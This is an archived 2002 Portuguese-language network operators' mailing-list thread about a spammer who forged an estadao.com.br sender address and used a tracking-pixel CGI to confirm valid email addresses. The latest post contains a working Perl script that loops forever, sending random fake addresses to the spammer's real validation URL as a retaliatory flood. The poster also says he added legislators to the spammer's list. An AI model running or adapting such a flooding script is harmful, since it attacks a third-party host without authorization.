[GTER] olha a malandragem do spamer...

Enomoto senomoto at estadao.com.br
Thu Jun 6 14:36:01 -03 2002 

   Caros,

   Adicionei alguns deputados a lista dele e botei um script em PERL pra
rodar:

----------------------[BEGIN]------------------
#!/usr/bin/perl
use LWP::Simple;
$|=1;

while (true) {
$URL="http://www.mailstock.com.br/email/visto.asp?Email=";
$user="";
for ($i=0;$i<(3+rand(30));$i++){
    if (rand(10) > 1) {
        $user.=chr(97+rand(26));
    } else {
        $user.=chr(48+rand(10));
    }
}
$domain="";
for ($i=0;$i<(3+rand(20));$i++){
    $domain.=chr(97+rand(26));
}

$tmp=int(rand(15));
if ($tmp <= 2) {$domain .= ".com.br";}
if ($tmp == 3) {$domain .= ".com";}
if ($tmp == 4) {$domain .= ".org.br";}
if ($tmp == 5) {$domain .= ".edu";}
if ($tmp == 6) {$domain = ".gov.br";}
if ($tmp == 7) {$domain = "zol.com.br";}
if ($tmp == 8) {$domain = "berra.com.br";}
if ($tmp == 9) {$domain = "iga.com.br";}
if ($tmp == 10) {$domain = "bostl.com.br";}
if ($tmp == 11) {$domain = "zipmaol.com.br";}
if ($tmp == 12) {$domain = "alunet.com.br";}
if ($tmp == 13) {$domain = "bltubo.com.br";}
if ($tmp >= 14) {$domain .= ".org";}

$email=$user.'@'.$domain;
print "$email\n";
$URL.=$email;
$result=get($URL);
}

----------------------[END]------------------

[]s
[Sandro]

-------- ---[Mensagem Original/Original Message]--- --------
>Assunto: Re: [GTER] olha a malandragem do spamer...
>Remetente: =?iso-8859-1?Q?Jo=E3o?= Carlos Mendes Luis
<jonny at jonny.eng.br>
>Data: Qui, 6 de Junho de 2002, 12:08
>
>
> Que tal um script para chamar esse CGI repetidamente com lixo?
>
> "Rubens Kuhl Jr." wrote:
>>
>> Um possivel contra-ataque e' gerar hits no sistema de checagem
para os
>> e-mails que sofreram bounce, tornando ineficaz o sistema de
validacao
>> de e-mails existentes...
>>
>> Rubens
>>
>> ----- Original Message -----
>> From: "Sandro Enomoto" <senomoto at estadao.com.br>
>> To: <gter at eng.registro.br>
>> Sent: Wednesday, June 05, 2002 7:43 PM
>> Subject: [GTER] olha a malandragem do spamer...
>>
>>          Caros,
>>
>>          Para variar, fomos vitimas de "tabela" de um spammer que
usou
>>          o
>> speedy dele para enviar um SPAM usando no envelope um
>> email at estadao.com.br. Estou enviando parte do email que deu
bounce, se
>> olharem abaixo ele colocou uma tag HTML de imagem, onde chama a
>> seguinte URL:
>>
>> http://www.mailstock.com.br/email/visto.asp?
Email=972147 at dcc.unicamp.br
>>
>>          Ou seja, a pessoa abre o email e de cara valida para a vitima
>> existe.... E bota no final do email, com toda cara de pau que ele foi
>> removido do cadastro após o envio... Claro, do cadastro de envio,
>> agora ele tem outro DB com os emails válidos.
>>
>> Return-Path: <reciclagemsp at estadao.com.br>
>> Received: from obelix.unicamp.br (obelix.unicamp.br [143.106.10.2])
>>          by grande.dcc.unicamp.br (8.9.3/8.9.3) with ESMTP id
UAA09120
>>          for <972147 at dcc.unicamp.br>; Wed, 5 Jun 2002 20:08:51 -
0300
>>          (EST)
>> Received: from estadao.com.br (200-221-112-12.dsl-sp.uol.com.br
>> [200.221.112.12]
>> )
>>          by obelix.unicamp.br (Postfix) with SMTP id 11E991A432
>>          for <972147 at dcc.unicamp.br>; Wed,  5 Jun 2002 20:07:45 -
0300
>>          (BRT)
>> From: "RECICLAGEM" <reciclagemsp at estadao.com.br>
>> To: <972147 at dcc.unicamp.br>
>> Subject: DIA MUNDIAL DO MEIO AMBIENTE
>> Sender: "RECICLAGEM" <reciclagemsp at estadao.com.br>
>> Mime-Version: 1.0
>> Content-Type: text/html; charset="ISO-8859-1"
>> Date: Wed, 5 Jun 2002 20:09:32 -0300
>> Content-Transfer-Encoding: 8bit
>> Message-Id: <20020605230746.11E991A432 at obelix.unicamp.br>
>>
>> <html>
>> <head>
>> <title>Vamos RECICLAR</title>
>> </head>
>> <body bgcolor="#FFFFFF">
>> <img
>> src="http://www.mailstock.com.br/email/visto.asp?E
>> mail=972147 at dcc.unicamp.br"
>> width="1" height="1"><p align=center
>> style='text-align:center'><b><span
>> style='font-size:13.5pt;font-family:Arial;
>> color:green'>Seu lixo pode ajudar a
>>    natureza, a sociedade e
>> você.</span></b><b><span style='font-size:18.0pt;
>> font-family:Arial;color:green'> </span></b></p>
>>
>> [...]
>> <font size="1">Nosso
>>    intuito não é desagradar e sim informar sobre
>> serviços que podem ser úteis a
>>    todos, inclusive a você, usuário da Internet.
>> Seu e-mail não consta mais de
>>    nosso cadastro, foi removido imediatamente
>> após o envio desta. Esta mensagem
>>    tomou menos de 2 segundos para ser
>> descarregada Desde já agradecemos sua
>> tolerância.</font>
>>
>> --
>> GTER list    http://eng.registro.br/mailman/listinfo/gter
>
> --
>
>                                        Jonny
>
> --
> João Carlos Mendes Luís                 jonny at starone.com.br
>  Networking Engineer                   jonny at jonny.eng.br
> --
> GTER list    http://eng.registro.br/mailman/listinfo/gter



--------------------------------------------------
Estadão - Internet com alta qualidade de conexão.
GANHE ACESSO GRATUITO à Internet do Estadão em
http://www.estadao.com.br/discador/
--------------------------------------------------

More information about the gter mailing list